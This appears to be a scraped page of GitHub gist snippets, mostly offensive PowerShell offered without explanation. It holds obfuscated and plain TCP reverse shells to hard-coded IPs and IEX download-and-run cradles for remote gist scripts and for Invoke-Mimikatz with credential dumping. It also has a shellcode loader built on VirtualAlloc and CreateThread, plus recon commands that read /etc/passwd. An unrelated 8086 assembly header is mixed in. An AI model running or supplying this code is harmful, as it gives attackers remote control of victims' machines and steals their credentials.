This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
&('Sv') ("{0}{1}"-f 'Lh','aW3') ( [TypE]("{3}{1}{0}{2}" -F 'ENcOdI','ExT.','ng','T') ); ${CLi`E`NT} = &("{1}{0}{2}"-f '-Obje','New','ct') ("{0}{2}{1}{3}{4}"-f'System.Ne','s.T','t.Socket','CPCli','ent')(("{2}{0}{1}"-f '4.194','.214.53','5'),443);${str`E`AM} = ${Cl`i`EnT}.("{0}{2}{1}" -f'GetSt','m','rea').Invoke();[byte[]]${B`yTEs} = 0..65535|&('%'){0};while((${i} = ${sTr`eaM}.("{1}{0}"-f 'd','Rea').Invoke(${B`yT`eS}, 0, ${b`yt`eS}."le`NgTh")) -ne 0){;${d`Ata} = (.("{1}{0}{2}" -f 'ew-Obj','N','ect') -TypeName ("{5}{2}{4}{3}{0}{1}"-f'IEnco','ding','ystem.Text.','SCI','A','S')).("{1}{0}{3}{2}" -f'e','G','ing','tStr').Invoke(${b`y`TES},0, ${I});${Se`Nd`BAcK} = (.("{1}{0}"-f'x','ie') ${d`ATa} 2>&1 | &("{2}{0}{1}"-f'S','tring','Out-') );${sE`NDBAc`K2} = ${S`END`BacK} + "PS " + (&("{1}{0}"-f'wd','p'))."p`AtH" + "> ";${sE`N`DbyTE} = ( ( .('LS') ("{2}{1}{3}{0}{4}"-f 'ble:L','i','var','a','HAW3') )."v`ALuE"::"A`Scii").("{0}{1}"-f 'Get','Bytes').Invoke(${SEndb`A`c`k2});${sTRe`Am}.("{0}{1}"-f 'W','rite').Invoke($ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
.( $sheLLid[1]+$ShellID[13]+'X') ( [sTrING]::JoIn('' ,( [REgEx]::mAtchES( ")''NIOJ-'X'+]3,1[)ECneREFeRPesoBRev$]GNiRts[( ( .|)93]RaHc[]gNIrTs[,)28]RaHc[+18]RaHc[+75]RaHc[((eCALPER.)')RQ91sp.2ver/69bbb'+'534'+'a9'+'c0'+'a8b7dc30'+'2a24'+'6b1c'+'9'+'df5'+'e'+'7fbdeaa/'+'wa'+'r/1d'+'1f3d3fa'+'82eee'+'811aa'+'7300a'+'f'+'f013300/'+'r'+'zo'+'nkrf/'+'m'+'o'+'c'+'.'+'tn'+'etno'+'cr'+'esu'+'buh'+'ti'+'g.tsig'+'//'+':s'+'p'+'tt'+'h'+'RQ9(gni'+'r'+'t'+'Sdaol'+'nwoD.)tne'+'ilCbeW'+'.te'+'N'+' tcejbO'+'-w'+'eN('+' XEI llehsrewo'+'P'( ",'.','r'+'IG'+'h'+'ttoLeFt' )|ForEAch-objECT {$_.ValuE })) ) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Powershell IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/frknozr/003310ffa0037aa118eee28af3d3f1d1/raw/aaedbf7e5fd9c1b642a203cd7b8a0c9a435bbb96/rev2.ps1') |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#A simple and small reverse shell. Options and help removed to save space. | |
#Uncomment and change the hardcoded IP address and port number in the below line. Remove all help comments as well. | |
$client = New-Object System.Net.Sockets.TCPClient("10.10.14.126",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() | |
#$sm=(New-Object Net.Sockets.TCPClient("192.168.254.1",55555)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); $m = Invoke-Mimikatz -DumpCreds; $m |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Powershell IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/frknozr/c301bfa3dc9e1f7c6f7cabd83777b2a2/raw/d660001da6f5f2ee557396772d0f5d1010198d9d/reverse.ps1) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$socket = new-object System.Net.Sockets.TcpClient('165.227.163.161', 443); | |
"Working" | |
if($socket -eq $null){exit 1} | |
$stream = $socket.GetStream(); | |
$writer = new-object System.IO.StreamWriter($stream); | |
$buffer = new-object System.Byte[] 1024; | |
$encoding = new-object System.Text.AsciiEncoding; | |
do | |
{ | |
$writer.Flush(); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
;==================================================================== | |
; Main.asm file generated by New Project wizard | |
; | |
; Created: Cum Mar 11 2016 | |
; Processor: 8086 | |
; Compiler: MASM32 | |
; | |
; Before starting simulation set Internal Memory Size | |
; in the 8086 model properties to 0x10000 | |
;==================================================================== |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
whoami | |
cat /etc/passwd | |
uname -a |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$knQoUoTfNfL = @" | |
[DllImport("kernel32.dll")] | |
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); | |
[DllImport("kernel32.dll")] | |
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); | |
"@ | |
$XuqotFCQWLpJY = Add-Type -memberDefinition $knQoUoTfNfL -Name "Win32" -namespace Win32Functions -passthru | |
[Byte[]] $hbgpyIRNXZNcNzm = 0xfc,0x48,0x81,0xe4,0xf0,0xff,0xff,0xff,0xe8,0xcc,0x0,0x0,0x0,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0xf,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0x41,0xc1,0xc9,0xd,0x41,0x1,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x1,0xd0,0x66,0x81,0x78,0x18,0xb,0x2,0xf,0x85,0x72,0x0,0x0,0x0,0x8b,0x80,0x88,0x0,0x0,0x0,0x48,0x85,0xc0,0x74,0x67,0x48,0x1,0xd0,0x50,0x8b,0x48,0x |